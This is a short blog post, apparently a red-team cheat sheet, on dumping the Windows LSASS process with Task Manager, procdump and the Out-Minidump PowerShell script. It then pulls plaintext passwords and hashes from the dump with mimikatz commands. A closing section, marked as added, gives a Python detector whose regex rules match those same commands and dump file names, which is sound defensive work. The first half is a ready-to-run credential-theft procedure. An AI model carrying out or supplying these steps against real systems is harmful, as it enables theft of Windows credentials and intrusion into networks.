LSASS Dumping
Create a dump file of the lsass process using multiple different techniques.
Task Manager
Create Dump File
- Open Task Manager and locate the LSASS process.
- It will be called lsass.exe or Local Security Authority Process.
- Right click on the process and select Create dump file.
Procdump
Download Tools
Download Sysinternals Suite from Microsoft here.
Dump LSASS
Run the following command in an Admin command prompt:
procdump64.exe -ma lsass.exe lsass.dmp
Minidump
Download Minidump
Download the required script from GitHub here, or a local copy can be found here.
Import & Run Minidump
Import Minidump module:
Import-Module .\Out-Minidump.ps1
Run the module and dump the process:
Get-Process lsass | Out-Minidump
Extract Passwords/Hashes from Dump File with Mimikatz
Download Mimikatz from GitHub here.
Open mimikatz.exe and run:
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords
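The three on-host dumping techniques above leave recognisable traces in process command lines, PowerShell script text and dump file names. The following is an added detection example, not part of the original post; the event dictionaries, host names and rule names are constructed for illustration.

```python
import re

# Each rule: (name, event kind it applies to, pattern).
# Patterns are built from the commands shown on this page.
RULES = [
    ("procdump_lsass", "cmdline",
     re.compile(r"procdump(64)?(\.exe)?\b.*\s-ma\b.*\blsass", re.I)),
    ("out_minidump_lsass", "script",
     re.compile(r"Get-Process\s+lsass\b.*\|\s*Out-Minidump", re.I)),
    ("out_minidump_import", "script",
     re.compile(r"Import-Module\s+\S*Out-Minidump\.ps1", re.I)),
    ("lsass_dump_file", "file",
     re.compile(r"\\lsass[^\\]*\.dmp$", re.I)),
]

# Constructed sample events (simplified; real telemetry would come from
# process-creation, PowerShell script-block and file-creation logs).
SAMPLE_EVENTS = [
    {"host": "WS01", "kind": "cmdline", "text": "procdump64.exe -ma lsass.exe lsass.dmp"},
    {"host": "WS01", "kind": "file", "text": r"C:\Users\admin\lsass.dmp"},
    {"host": "WS02", "kind": "script", "text": r"Import-Module .\Out-Minidump.ps1"},
    {"host": "WS02", "kind": "script", "text": "Get-Process lsass | Out-Minidump"},
    {"host": "WS03", "kind": "file", "text": r"C:\Users\bob\AppData\Local\Temp\lsass.DMP"},
    {"host": "WS04", "kind": "cmdline", "text": "procdump64.exe -ma notepad.exe notepad.dmp"},
    {"host": "WS04", "kind": "script", "text": "Get-Process lsass | Select-Object Id"},
]

def detect(events):
    """Return (host, rule_name) for every event matching a rule of its kind."""
    hits = []
    for ev in events:
        for name, kind, pattern in RULES:
            if ev["kind"] == kind and pattern.search(ev["text"]):
                hits.append((ev["host"], name))
    return hits

def hosts_to_triage(events):
    """Group hits per host so one alert covers a whole dumping sequence."""
    grouped = {}
    for host, name in detect(events):
        grouped.setdefault(host, []).append(name)
    return grouped

if __name__ == "__main__":
    for host, names in hosts_to_triage(SAMPLE_EVENTS).items():
        print(host, names)
```

String matching only catches the literal forms shown on this page; process-access telemetry on lsass.exe (for example Sysmon event ID 10) is the sturdier signal to pair it with.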
This post is licensed under CC BY 4.0 by the author.